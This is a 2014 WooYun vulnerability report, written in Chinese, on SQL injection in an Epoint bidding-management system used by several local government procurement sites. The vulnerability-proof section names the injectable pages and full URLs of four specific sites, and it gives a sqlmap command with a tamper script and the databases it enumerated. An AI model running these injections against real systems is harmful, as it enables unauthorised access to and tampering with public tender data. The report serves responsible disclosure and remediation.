某公共资源交易管理系统部分存在SQL注射漏洞影响部分政府单位#1

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-047515

漏洞标题：某公共资源交易管理系统部分存在SQL注射漏洞影响部分政府单位#1

漏洞作者：鶆鶈

提交时间：2014-05-08 14:45

修复时间：2014-08-06 14:46

公开时间：2014-08-06 14:46

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-05-08：细节已通知厂商并且等待厂商处理中
2014-05-11：厂商已经确认，细节仅向厂商公开
2014-05-14：细节向第三方安全合作伙伴开放
2014-07-05：细节向核心白帽子及相关领域专家公开
2014-07-15：细节向普通白帽子公开
2014-07-25：细节向实习白帽子公开
2014-08-06：细节向公众公开

简要描述：

某次投标时遇到的，求刷RANK。
某公共资源交易管理系统，具体名字未知，开发厂家是江苏国泰新点软件有限公司（Epoint），部分存在SQL注射漏洞，版本未知。
该系统主要用于招/投标业务，从业务逻辑上主要分为前台信息发布、监管人员登录系统、会员系统（投标单位登录系统）、评委审核系统，攻击者通过SQL注射技术可以取得这几个系统的控制权限，篡改系统中任意数据。年底了，标也多了，这种业务系统的安全性还是值得注意哈～

详细说明：

主要发现有两处存在注射漏洞（通常还是SA+WithError的）：一是查看注册的投标厂家扫描原件处，页面URL通常为：~/会员系统/BackEnd/AttachManage/AttachView_Single.aspx?CliengGuid=xx-xx&ClientType=M&ModuleType=N；二是会员注册检测用户名处，（有些地方可能把注册功能隐藏了，但并没有把相关页面删除，漏洞依然存在。）这是POST型的，后面就不举例了。
使用这套Epoint系统的单位不少，还好存在上述的漏洞不多，应该是某特定版本吧。没看到版本信息，找起来费姥劲了，以下是确认存在上述漏洞的单位：
扬中市招标投标网，注射点如：http://222.186.64.169/yzhy/BackEnd/AttachManage/AttachView_Single.aspx?CliengGuid=ebf6565f-3fd8-4586-b413-4bbf2667e7b6&ClientType=13&ModuleType=8102
宜昌市公共资源交易中心，注射点如：http://www.ycztb.com/ycsite/consultant/showresault.aspx?ShowLsh=0&Mlsh=609563
滁州招标采购网，注射点如：http://www.czzbcg.com/czhy/BackEnd/AttachManage/AttachView_Single.aspx?CliengGuid=9cb37289-4ab2-4929-aa46-993e539e91fb&ClientType=13&ModuleType=8102
泰兴市建设工程信息网，注射点如：http://www.txcetc.com:6920/txhy/BackEnd/AttachManage/AttachView_Single.aspx?CliengGuid=6e279cde-d5a3-43bd-92ad-58d0ffa2d7c1&ClientType=13&ModuleType=8103

漏洞证明：

ent@debian:~$ sqlmap -u "http://www.txcetc.com:6920/txhy/BackEnd/AttachManage/AttachView_Single.aspx?CliengGuid=6e279cde-d5a3-43bd-92ad-58d0ffa2d7c1&ClientType=13&ModuleType=8103" -p ModuleType --tamper=space2comment.py --dbs
available databases [36]:
[*] [pbjs-1]
[*] CTICenter222
[*] CTICenter_TaiXing
[*] djbpb
[*] Epoind_TXTemp
[*] EpointBid_New
[*] EpointBid_PB
[*] EpointBid_PB2012
[*] EpointBid_PB2012Test
[*] EpointBid_PB2012Test_New
[*] EpointBid_TaiXing
[*] EpointBid_TaiXingTest
[*] EpointBid_TaiXingTestbak
[*] EpointBid_TX2012
[*] EpointBid_TX2012Test
[*] EpointBid_TXBZB
[*] EpointBid_TXTest
[*] EpointDataExchangeLog
[*] EpointSoftUpdateServer
[*] EpointWeb_TaiXing
[*] f2009
[*] f2009Test
[*] F2011
[*] F2012_New
[*] F2012tx
[*] F2012txTest
[*] F201305_Test
[*] F201308
[*] Fbzb2012
[*] master
[*] model
[*] msdb
[*] PB_TX
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] shutting down at 10:05:37
ent@debian:~$

修复方案：

1) 目标系统对SQL注射的防护并不理想，除上述列出的注射点，还有其它多处已知的或未知的，建议上个WAF什么的吧，特别是这些政府单位部门；
2) 联系软件的开发厂家(Epoint，江苏国泰新点软件)，让他们从代码层上修复；
3) 测试上述漏洞的时候发现相关单位或多或少存在些其它的安全问题，也许你们需要找人对这些应用系统来个整体的安全性评估渗透测试安全加固什么的。

版权声明：转载请注明来源鶆鶈@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2014-05-11 21:19

厂商回复：

CNVD确认并复现所述情况，由CNVD通过公开联系渠道向软件生产厂商江苏国泰新点软件有限公司通报处置，同时将涉及的事业单位案例转由CNCERT下发分中心处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-047515

漏洞标题：某公共资源交易管理系统部分存在SQL注射漏洞影响部分政府单位#1

相关厂商：部分政府单位部门

漏洞作者：鶆鶈

提交时间：2014-05-08 14:45

修复时间：2014-08-06 14:46

公开时间：2014-08-06 14:46

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源鶆鶈@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-047515

漏洞标题：某公共资源交易管理系统部分存在SQL注射漏洞影响部分政府单位#1

相关厂商：部分政府单位部门

漏洞作者： 鶆鶈

提交时间：2014-05-08 14:45

修复时间：2014-08-06 14:46

公开时间：2014-08-06 14:46

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-047515"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 鶆鶈@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：鶆鶈

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源鶆鶈@乌云